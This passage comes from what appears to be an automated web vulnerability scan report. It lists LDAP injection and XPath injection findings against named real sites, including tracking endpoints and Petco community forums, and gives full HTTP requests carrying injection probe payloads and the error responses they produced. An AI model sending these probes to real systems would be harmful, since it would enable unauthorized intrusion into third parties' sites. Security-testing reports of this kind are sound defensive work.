<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Fasara Interior Design Window Film - Rice Paper
...[SNIP]...

2. LDAP injection previous next
There are 3 instances of this issue:

http://action.media6degrees.com/orbserv/hbjs [pixId parameter]
http://cimg-1.restorationhardware.com/cm [ci parameter]
http://server.bhphotovideo.com/cm [ci parameter]

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

2.1. http://action.media6degrees.com/orbserv/hbjs [pixId parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://action.media6degrees.com
Path:	/orbserv/hbjs

Issue detail

The pixId parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the pixId parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /orbserv/hbjs?pixId=*)(sn=*&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f3000a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000pj0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z5k0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:10 GMT; Path=/
Set-Cookie: JSESSIONID=BFCF45F58B9C4575A09FBB0A8F2FCF28; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 5
Date: Mon, 16 May 2011 01:56:09 GMT

Request 2

GET /orbserv/hbjs?pixId=*)!(sn=*&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f3100a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000pk0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z5l0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:56:11 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 5
Date: Mon, 16 May 2011 01:56:10 GMT

2.2. http://cimg-1.restorationhardware.com/cm [ci parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cimg-1.restorationhardware.com
Path:	/cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 84d15caee2971e21)(sn=* and 84d15caee2971e21)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?tid=6&ci=84d15caee2971e21)(sn=*&vn2=e3.1&st=1305510801743&vn1=4.3.5&ec=utf-8&pc=Y&pi=HOME%20PAGE&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.restorationhardware.com/&lp=expanding-banner%20email-signup HTTP/1.1
Host: cimg-1.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; CoreID6=30201305509985211832254; TestSess3=30201305509985211832254; 90007517_login=1305509992016783873090007517; 90007517_reset=1305509994; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510793290}; fsr.a=1305510801727

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:23 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 84d15caee2971e21)(sn=*_login=1305510803016783924284d15caee2971e21)(sn=*; path=/
Set-Cookie: 84d15caee2971e21)(sn=*_reset=1305510803;path=/
Expires: Sun, 15 May 2011 07:53:23 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?tid=6&ci=84d15caee2971e21)!(sn=*&vn2=e3.1&st=1305510801743&vn1=4.3.5&ec=utf-8&pc=Y&pi=HOME%20PAGE&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=32&tz=5&ul=http%3A//www.restorationhardware.com/&lp=expanding-banner%20email-signup HTTP/1.1
Host: cimg-1.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; CoreID6=30201305509985211832254; TestSess3=30201305509985211832254; 90007517_login=1305509992016783873090007517; 90007517_reset=1305509994; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510793290}; fsr.a=1305510801727

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:23 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 84d15caee2971e21)!(sn=*_login=1305510803015106202684d15caee2971e21)!(sn=*; path=/
Set-Cookie: 84d15caee2971e21)!(sn=*_reset=1305510803;path=/
Expires: Sun, 15 May 2011 07:53:23 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.3. http://server.bhphotovideo.com/cm [ci parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://server.bhphotovideo.com
Path:	/cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 4f30a508a84f4dfe)(sn=* and 4f30a508a84f4dfe)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?ci=4f30a508a84f4dfe)(sn=*&st=1305509945626&vn1=4.2.15-AdTarget&ec=utf-8&pi=RootPage.jsp&ul=http%3A//www.bhphotovideo.com&tid=10&ti=1305510778300&fo=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1%3AU&fi=0%3A0%3A%3B HTTP/1.1
Host: server.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; CoreID6=70091305509949141053400; TestSess3=70091305509949141053400; 90132819_login=1305509951001684455490132819; 90132819_reset=1305509951

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 4f30a508a84f4dfe)(sn=*_login=130551078001678392424f30a508a84f4dfe)(sn=*; path=/
Set-Cookie: 4f30a508a84f4dfe)(sn=*_reset=1305510780;path=/
Expires: Sun, 15 May 2011 07:53:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=4f30a508a84f4dfe)!(sn=*&st=1305509945626&vn1=4.2.15-AdTarget&ec=utf-8&pi=RootPage.jsp&ul=http%3A//www.bhphotovideo.com&tid=10&ti=1305510778300&fo=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1%3AU&fi=0%3A0%3A%3B HTTP/1.1
Host: server.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; CoreID6=70091305509949141053400; TestSess3=70091305509949141053400; 90132819_login=1305509951001684455490132819; 90132819_reset=1305509951

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 4f30a508a84f4dfe)!(sn=*_login=130551078001007303784f30a508a84f4dfe)!(sn=*; path=/
Set-Cookie: 4f30a508a84f4dfe)!(sn=*_reset=1305510780;path=/
Expires: Sun, 15 May 2011 07:53:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

3. XPath injection previous next
There are 8 instances of this issue:

/discussions/Cat_Discussion_Forum/fd03p00v02d1 [config parameter]
/discussions/Dog_Discussion_Forum/fd03p00v01d1 [config parameter]
/discussions/Fish_Discussion_Forum/fd03p00v03d1 [config parameter]
/discussions/Reptile_Discussion_Forum/fd03p00v05d1 [config parameter]
/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1 [config parameter]
/discussions/Social_Applications_Polls/fd03p00v00apoll [config parameter]
/n/blogs/blog.aspx [config parameter]
/n/pfx/forum.aspx [config parameter]

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

3.1. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1 [config parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.petco.com
Path:	/discussions/Cat_Discussion_Forum/fd03p00v02d1

Issue detail

The config parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the config parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /discussions/Cat_Discussion_Forum/fd03p00v02d1?widgetId=PTWidget3&cdsn=476&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.2. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1 [config parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.petco.com
Path:	/discussions/Dog_Discussion_Forum/fd03p00v01d1

Issue detail

Request

GET /discussions/Dog_Discussion_Forum/fd03p00v01d1?widgetId=PTWidget2&cdsn=568&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.3. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1 [config parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.petco.com
Path:	/discussions/Fish_Discussion_Forum/fd03p00v03d1

Issue detail

Request

GET /discussions/Fish_Discussion_Forum/fd03p00v03d1?widgetId=PTWidget4&cdsn=873&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10894

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.4. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1 [config parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.petco.com
Path:	/discussions/Reptile_Discussion_Forum/fd03p00v05d1

Issue detail

Request

GET /discussions/Reptile_Discussion_Forum/fd03p00v05d1?widgetId=PTWidget7&cdsn=892&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.5. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1 [config parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.petco.com
Path:	/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

Issue detail

Request

GET /discussions/Small_Animal_Discussion_Forum/fd03p00v04d1?widgetId=PTWidget5&cdsn=224&config=recentDiscussions0001'&pttv=2&includeCSS=false&nav=widget HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
